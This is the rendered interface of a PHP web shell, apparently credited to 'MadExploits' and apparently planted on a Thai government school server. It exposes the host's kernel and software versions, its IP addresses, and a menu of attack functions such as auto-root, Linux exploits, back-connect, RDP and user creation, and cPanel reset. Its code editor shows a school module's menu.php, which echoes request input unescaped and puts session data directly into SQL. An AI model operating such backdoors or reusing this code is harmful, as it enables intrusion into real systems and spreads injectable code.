Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
school_gis /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
default.php
342
B
-rw-r--r--
index.php
2.26
KB
-rw-r--r--
json.php
4.68
KB
-rw-r--r--
menu.php
1.98
KB
-rw-r--r--
menu_mobile.php
803
B
-rw-r--r--
route.php
9.09
KB
-rw-r--r--
select-route.php
1.59
KB
-rw-r--r--
setmap-school.php
323
B
-rw-r--r--
setmap.php
6.95
KB
-rw-r--r--
view.php
11.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); ?> <!-- เมนู --> <?php // เมนูสำหรับผู้ดูแล Module $sql_permission = "select * from person_permission where person_id='$_SESSION[login_user_id]'"; $dbquery_permission = mysqli_query($connect,$sql_permission); $result_permission = mysqli_fetch_array($dbquery_permission); // เปลี่ยนจาก ioffice เป็นชื่อ Module ?> <table width='100%' border='0' cellspacing='0' cellpadding='0'> <tr bgcolor='#FFCC00'><td> <ul id='nav' class='dropdown dropdown-horizontal'> <li><a href='./'><span class='glyphicon glyphicon-home' aria-hidden='true'></span> รายการหลัก</a></li> <li><a href='#' class='dir'><span class='glyphicon glyphicon-cog' aria-hidden='true'></span> ตั้งค่าระบบ <span class="caret"></span></a> <ul> <li><a href='?option=<?php echo $_GET['option']; ?>&task=setmap'><span class='glyphicon glyphicon-map-marker' aria-hidden='true'></span> บันทึกพิกัด สพท.</a></li> <li><a href='?option=<?php echo $_GET['option']; ?>&task=setmap-school'><span class='glyphicon glyphicon-screenshot' aria-hidden='true'></span> บันทึกพิกัดโรงเรียน</a></li> </ul> </li> <li><a href='#' class='dir'><span class='glyphicon glyphicon-list' aria-hidden='true'></span> รายงาน <span class="caret"></span></a> <ul> <li><a href='?option=<?php echo $_GET['option']; ?>&task=view'><span class='glyphicon glyphicon-map-marker' aria-hidden='true'></span> แผนที่ภูมิศาสตร์โรงเรียน</a></li> <li><a href='?option=<?php echo $_GET['option']; ?>&task=route'><span class='glyphicon glyphicon-road' aria-hidden='true'></span> คำนวนหาระยะทาง</a></li> </ul> </li> </td> </tr> </table>
Close